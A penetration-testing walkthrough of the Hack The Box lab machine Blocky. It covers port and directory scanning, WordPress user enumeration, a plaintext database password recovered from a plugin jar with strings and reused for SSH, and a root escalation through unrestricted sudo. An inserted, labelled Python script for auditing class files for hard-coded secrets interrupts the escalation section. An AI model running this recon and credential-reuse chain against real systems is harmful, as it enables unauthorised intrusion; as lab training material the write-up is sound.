
Penetration testing: HTB Blocky, directory listing vulnerability and sensitive file disclosure

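Disclaimer

The host tested in this article was tested with legal authorization. The tools and methods used in this article are for learning and exchange only. Please do not use the tools or the penetration approach described here for any illegal purpose. I accept no responsibility for any consequences that result, and I am not liable for any misuse or damage caused.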

Service detection

┌──(root💀kali)-[~/htb/Blocky]
└─# nmap -sV -Pn 10.10.10.37 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-11-29 22:40 EST
Nmap scan report for 10.10.10.37
Host is up (0.34s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 696.03 seconds

Three services are open: ftp, ssh and http.

Port 80 opens to a WordPress site.

The FTP service appears to have a remote command execution vulnerability.

┌──(root💀kali)-[~/htb/Blocky]
└─# searchsploit ProFTPD 1.3.5
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                                                                                 | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                                                                       | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                                                                                                                                                                 | linux/remote/36742.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

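Copy 36803.py to the current directory. The exploit requires a writable web directory, and we do not yet know which directory is writable, so we need to look further into port 80.

Directory brute-forcing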

└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.37                                                                         

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.37/_21-11-29_22-50-04.txt

Error Log: /root/dirsearch/logs/errors-21-11-29_22-50-04.log

Target: http://10.10.10.37/

[22:50:06] Starting:    
[22:51:25] 301 -    0B  - /index.php  ->  http://10.10.10.37/               
[22:51:29] 301 -  315B  - /javascript  ->  http://10.10.10.37/javascript/   
[22:51:32] 200 -   19KB - /license.txt                                      
[22:51:46] 200 -   13KB - /phpmyadmin/doc/html/index.html                   
[22:51:47] 301 -  315B  - /phpmyadmin  ->  http://10.10.10.37/phpmyadmin/   
[22:51:48] 200 -   10KB - /phpmyadmin/                                      
[22:51:48] 301 -  312B  - /plugins  ->  http://10.10.10.37/plugins/         
[22:51:48] 200 -  745B  - /plugins/                                         
[22:51:49] 200 -   10KB - /phpmyadmin/index.php                             
[22:51:51] 200 -    7KB - /readme.html                                                                    
[22:52:11] 200 -  380B  - /wiki/                                            
[22:52:11] 301 -  309B  - /wiki  ->  http://10.10.10.37/wiki/
[22:52:11] 301 -  313B  - /wp-admin  ->  http://10.10.10.37/wp-admin/       
[22:52:11] 200 -    1B  - /wp-admin/admin-ajax.php                          
[22:52:11] 200 -    1KB - /wp-admin/install.php                             
[22:52:11] 500 -    4KB - /wp-admin/setup-config.php                        
[22:52:11] 200 -    0B  - /wp-config.php                                    
[22:52:12] 200 -    0B  - /wp-content/                                      
[22:52:12] 301 -  315B  - /wp-content  ->  http://10.10.10.37/wp-content/   
[22:52:12] 500 -    0B  - /wp-content/plugins/hello.php
[22:52:12] 200 -   69B  - /wp-content/plugins/akismet/akismet.php           
[22:52:12] 200 -    0B  - /wp-cron.php                                      
[22:52:12] 301 -  316B  - /wp-includes  ->  http://10.10.10.37/wp-includes/ 
[22:52:12] 200 -  965B  - /wp-content/uploads/                              
[22:52:12] 500 -    0B  - /wp-includes/rss-functions.php                    
[22:52:12] 200 -    2KB - /wp-login.php                                     
[22:52:12] 302 -    0B  - /wp-signup.php  ->  http://10.10.10.37/wp-login.php?action=register
[22:52:12] 405 -   42B  - /xmlrpc.php                                       
[22:52:13] 200 -   40KB - /wp-includes/  

Several folders are affected by the directory listing vulnerability.

Enumerate usernames with wpscan

wpscan --url http://10.10.10.37 --enumerate u1-200

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:17 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:00:17

[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

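There is a user named notch.

Brute-forcing the WordPress admin panel, ftp, ssh and phpmyadmin with this username got nowhere …

Initial shell

It seemed we had hit a dead end.

So the only option was to look through the brute-forced directories for anything useful. The /plugins/ directory contains two downloadable jar files.

Extract BlockyCore.class from BlockyCore.jar and inspect it with the strings command.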

┌──(root💀kali)-[~/htb/Blocky]
└─# strings BlockyCore.class 
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
        localhost
root
8YsqfCTnvxAUeduzjNSXe22
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.java

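There appears to be a user credential: root:8YsqfCTnvxAUeduzjNSXe22

However, it does not work for logging in to ssh or ftp.

Then logging in with the username notch found earlier unexpectedly worked, which gives us our initial shell.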

┌──(root💀kali)-[~/htb/Blocky]
└─# ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$ 

user.txt is in the home directory.

Privilege escalation

Check sudo privileges
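
The credential in this section was readable because it sits as a plain string literal in the class file's constant pool, which is what strings prints. As an added example (not code from the original post), the following Python audit parses a .class constant pool and flags secret-looking literals in classes whose member names suggest credentials, a check a defender can run on build artifacts before they are placed in a web-served directory. The function names, the name pattern, the heuristic and the sample bytes are assumptions constructed for illustration.

```python
import re
import struct

# Bytes after the tag for fixed-size constant-pool entries (JVM spec 4.4).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
CRED_NAME = re.compile(r"pass|pwd|secret|token|apikey", re.I)

def parse_constant_pool(data):
    """Return (utf8, literal_idx): Utf8 text by pool index, and the indexes
    that CONSTANT_String entries (string literals in the code) point at."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    (count,) = struct.unpack_from(">H", data, 8)
    utf8, literal_idx = {}, []
    pos, idx = 10, 1
    while idx < count:
        tag = data[pos]
        if tag == 1:                                  # CONSTANT_Utf8
            (n,) = struct.unpack_from(">H", data, pos + 1)
            utf8[idx] = data[pos + 3:pos + 3 + n].decode("utf-8", "replace")
            pos += 3 + n
        elif tag in FIXED:
            if tag == 8:                              # CONSTANT_String
                literal_idx.append(struct.unpack_from(">H", data, pos + 1)[0])
            pos += 1 + FIXED[tag]
        else:
            raise ValueError(f"unknown constant tag {tag} at offset {pos}")
        idx += 2 if tag in (5, 6) else 1              # long/double take two slots
    return utf8, literal_idx

def audit_class(data):
    """Heuristic audit; it does not trace bytecode to pair field and value."""
    utf8, literal_idx = parse_constant_pool(data)
    names = sorted(s for i, s in utf8.items()
                   if i not in literal_idx and CRED_NAME.search(s))
    literals = [utf8.get(i, "") for i in literal_idx]
    # Candidate secrets: 8+ characters, no spaces, letters and digits mixed.
    candidates = [s for s in literals if len(s) >= 8 and " " not in s
                  and re.search(r"[A-Za-z]", s) and re.search(r"\d", s)]
    return {"credential_names": names, "candidates": candidates if names else []}

# Constructed sample (ASCII only): class-file header plus a constant pool
# shaped like the strings output above, with a placeholder instead of a password.
def _u(s): return b"\x01" + struct.pack(">H", len(s)) + s.encode()
def _s(i): return b"\x08" + struct.pack(">H", i)
SAMPLE = (b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 14)
          + _u("sqlHost") + _u("sqlUser") + _u("sqlPass") + _u("localhost")
          + _s(4) + _u("root") + _s(6) + _u("Ex4mplePlaceholder99") + _s(8)
          + b"\x05" + bytes(8) + _u("Welcome to the server") + _s(12))
```

Calling audit_class(SAMPLE) reports sqlPass as a credential-like member name and the placeholder literal as the candidate secret; a finding like this means the value should move to configuration outside the artifact and the password should be rotated.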

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch can run any command with root privileges...

That makes it simple: escalate directly to root.

notch@Blocky:~$ sudo bash -p
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:~# whoami
root